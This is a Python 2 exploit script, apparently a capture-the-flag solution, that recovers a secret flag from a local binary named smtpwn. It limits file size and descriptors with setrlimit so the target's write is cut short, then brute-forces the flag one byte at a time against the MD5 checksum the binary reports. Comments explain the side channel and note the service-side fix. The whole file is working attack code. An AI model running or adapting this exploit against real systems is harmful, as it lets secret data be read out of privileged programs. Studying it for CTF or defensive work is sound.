#!/usr/bin/python2
import os
import sys
import socket
import getpass
import hashlib
from resource import *
from time import localtime, strftime
from subprocess import Popen, PIPE
# Template for the message text that sploit() reconstructs and hashes.
# It is filled with `FORMAT % locals()`, so the placeholder names
# (username, hostname, date, flag) must match local variable names there.
FORMAT = (
    'Message-ID: <>\r\n'
    'From: "%(username)s" <%(username)s@%(hostname)s>\r\n'
    'To: "flagholder" <flagholder@%(hostname)s>\r\n'
    'Date: %(date)s\r\n'
    'X-Flag: %(flag)s'
)
def sploit(argc, argv):
    """Recover the X-Flag value one byte at a time via a checksum side channel.

    The function has two modes, selected by ``argc``:

    * ``argc > 1`` (child): ``argv[1]`` is the flag prefix known so far. The
      process caps its own file-size limit at the length of the message built
      from that prefix plus one byte, caps open descriptors at 4, and then
      replaces itself with ``/home/smtpwn/smtpwn``.
    * otherwise (driver): repeatedly re-runs this script in child mode, reads
      the ``checksum: ...)`` value from the child's stdout, and tries
      candidate bytes until the MD5 of the guessed message equals it.

    Returns None; progress and the final flag are printed to stdout.

    NOTE(review): the target binary is not part of this file. Presumably it
    writes a message in the FORMAT layout and reports an MD5 over what was
    actually written, so a truncated write reveals one unknown byte per run.
    On the service side the corresponding fix would be to treat a short or
    failed write as an error and not disclose a digest of secret content --
    confirm against the target's source.
    """
    hostname = socket.gethostname()
    username = getpass.getuser()
    #username = "smtpwn"
    if argc > 1:
        # Child mode. FORMAT % locals() reads username, hostname, date and
        # flag from the local names, so these names must not be renamed.
        flag = argv[1]
        date = strftime("%a, %d %B %Y %T +0100", localtime())
        guessed_file = FORMAT % locals()
        # One byte more than the message built from the known prefix.
        fsize = len(guessed_file) + 1
        # Soft and hard limits are set together; resource limits are
        # inherited across execve, so they apply to the target program.
        setrlimit(RLIMIT_FSIZE, (fsize, fsize,))
        setrlimit(RLIMIT_NOFILE, (4, 4,))
        # Empty argv and empty environment; does not return on success.
        os.execve("/home/smtpwn/smtpwn", [], {})
    else:
        # Driver mode: final_flag accumulates the recovered prefix.
        final_flag = ''
        while True:
            # Recomputed per round with one-second resolution (%T); the
            # child computes its own timestamp. If no candidate matches in
            # a round, the loop simply runs another round.
            date = strftime("%a, %d %B %Y %T +0100", localtime())
            p = Popen([argv[0], final_flag],stdin=PIPE,stdout=PIPE,stderr=PIPE)
            # "tg" is sent on the child's stdin; only stdout is kept.
            out = p.communicate("tg")[0]
            # Take the text between "checksum: " and the next ")".
            # Raises IndexError if the marker is absent from the output.
            checksum = out.split("checksum: ")[1].split(")")[0]
            # Candidates are byte values 0..254 (range(255) excludes 0xFF).
            for c in range(255):
                flag = final_flag + chr(c)
                guessed_file = FORMAT % locals()
                if hashlib.md5(guessed_file).hexdigest() == checksum:
                    print "[+]", flag
                    final_flag = flag
                    # A newline is taken as the end of the flag.
                    if c == 0x0A:
                        print "Final flag:", flag
                        return
                    # Byte found: start the next round with the longer prefix.
                    break
if __name__ == "__main__":
    # Script entry point: with no arguments sploit() runs as the driver,
    # with a prefix argument it runs in child mode.
    sploit(argc=len(sys.argv), argv=sys.argv)